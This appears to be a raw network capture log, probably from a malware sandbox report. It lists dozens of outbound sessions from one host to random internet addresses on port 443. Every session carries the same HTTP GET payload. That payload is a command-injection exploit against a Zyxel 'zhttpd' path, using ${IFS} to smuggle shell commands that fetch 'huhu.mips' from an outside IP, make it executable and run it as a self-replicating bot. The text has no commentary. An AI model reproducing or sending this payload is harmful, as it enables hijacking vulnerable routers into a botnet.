                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3423192.168.2.144028276.9.107.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555085897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3424192.168.2.1446176141.39.113.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555124998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3425192.168.2.1456676170.72.195.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555155993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3426192.168.2.145096059.16.222.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555186987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3427192.168.2.1458394108.75.66.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555226088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3428192.168.2.1432900117.249.175.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555269957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3429192.168.2.1435780188.80.48.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555319071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3430192.168.2.1443184144.110.138.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555367947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3431192.168.2.1460766197.206.9.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555404902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3432192.168.2.144419695.14.107.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555459023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3433192.168.2.1433366105.61.24.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555481911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3434192.168.2.145900253.175.35.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555502892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3435192.168.2.1457728105.239.180.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555553913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3436192.168.2.1457854204.20.5.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555600882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3437192.168.2.1436916133.107.17.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555627108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3438192.168.2.145647448.8.114.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555681944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3439192.168.2.1454056203.113.219.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555737972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3440192.168.2.1438224198.33.63.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555777073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3441192.168.2.144439084.109.86.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555804014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3442192.168.2.1456016204.143.55.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555850983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3443192.168.2.1443960142.223.36.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555885077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3444192.168.2.1444250161.187.246.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555932999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3445192.168.2.1458098167.54.221.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555967093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3446192.168.2.144448651.172.103.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555984020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3447192.168.2.1437070105.1.244.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556024075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3448192.168.2.145535681.27.150.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556072950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3449192.168.2.145249671.233.103.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556126118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3450192.168.2.145280632.201.220.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556163073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3451192.168.2.1440712163.73.231.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556197882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3452192.168.2.145994095.141.168.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556225061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3453192.168.2.1437792209.9.104.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556303024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3454192.168.2.1437298173.30.228.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556344032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3455192.168.2.1441208179.53.41.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556390047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3456192.168.2.1447076177.222.194.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556428909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3457192.168.2.144609413.91.227.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556464911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3458192.168.2.1457368188.197.80.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556500912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3459192.168.2.144709877.101.101.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556545019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3460192.168.2.143674871.18.68.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556566954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3461192.168.2.1435626198.221.152.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556627035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3462192.168.2.1449730217.25.108.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556652069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3463192.168.2.143925837.252.116.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556694031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3464192.168.2.144962846.46.81.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556719065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3465192.168.2.1451492163.123.64.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556757927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3466192.168.2.1437506172.89.218.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556807995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3467192.168.2.143935631.106.230.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556844950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3468192.168.2.1446122106.223.125.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556874990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3469192.168.2.1456842196.34.130.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556921005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3470192.168.2.144520690.94.43.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556957960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3471192.168.2.1447144187.214.153.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.556977034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3472192.168.2.1448798143.113.179.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557041883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3473192.168.2.1450406135.151.214.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557044029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3474192.168.2.144600434.83.210.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557100058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3475192.168.2.145676652.191.52.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557156086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3476192.168.2.1438356201.134.238.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557190895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3477192.168.2.1460494165.55.196.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557246923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3478192.168.2.144850627.250.249.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557279110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3479192.168.2.143523082.121.54.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557308912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3480192.168.2.1456310211.85.139.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557380915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3481192.168.2.143674648.112.76.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557403088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3482192.168.2.144704887.207.252.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557454109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3483192.168.2.1458028163.165.219.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557496071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3484192.168.2.145209624.208.175.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557538986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3485192.168.2.144495024.49.66.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557574034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
